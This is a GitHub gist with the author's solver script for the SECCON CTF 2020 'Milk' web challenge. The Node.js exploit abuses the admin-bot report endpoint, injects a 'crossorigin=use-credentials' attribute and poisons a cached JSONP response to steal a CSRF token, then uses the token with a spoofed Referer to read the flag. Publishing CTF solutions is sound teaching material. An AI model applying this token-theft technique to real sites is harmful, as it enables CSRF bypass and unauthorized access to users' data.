Skip to content

Instantly share code, notes, and snippets.

@hakatashi

hakatashi/milk-solver.js

Last active October 11, 2020 12:32
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hakatashi/6dca5378e132efe3249aa6909e02112b to your computer and use it in GitHub Desktop.
Save hakatashi/6dca5378e132efe3249aa6909e02112b to your computer and use it in GitHub Desktop.
Download ZIP
SECCON CTF 2020 Milk - Author's Solver
Raw
milk-solver.js
const Axios = require('axios');
const qs = require('querystring');
const https = require('https');
const random = Array(10).fill().map(() => 'abcdefg'[Math.floor(Math.random() * 6)]).join('');
(async () => {
const axios = Axios.create({
httpsAgent: new https.Agent({
rejectUnauthorized: false,
}),
});
const {data: reportResult} = await axios({
method: 'POST',
url: 'https://milk.chal.seccon.jp/report',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
data: qs.stringify({
url: `https://milk.chal.seccon.jp./note.php?${qs.stringify({
id: 'hoge',
_: `${random} crossorigin=use-credentials`,
})}`
}),
});
console.log(reportResult);
await new Promise((resolve) => setTimeout(resolve, 10000));
const {data: csrfTokenJsonp} = await axios.get('https://milk-api.chal.seccon.jp/csrf-token', {
params: {
_: random,
},
});
const csrfToken = csrfTokenJsonp.match(/'(.+?)'/)[1];
console.log(csrfToken);
const {data: flag} = await axios.get('https://milk-api.chal.seccon.jp/notes/flag', {
params: {
token: csrfToken,
},
headers: {
Referer: 'https://milk.chal.seccon.jp/',
},
});
console.log(flag);
})();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment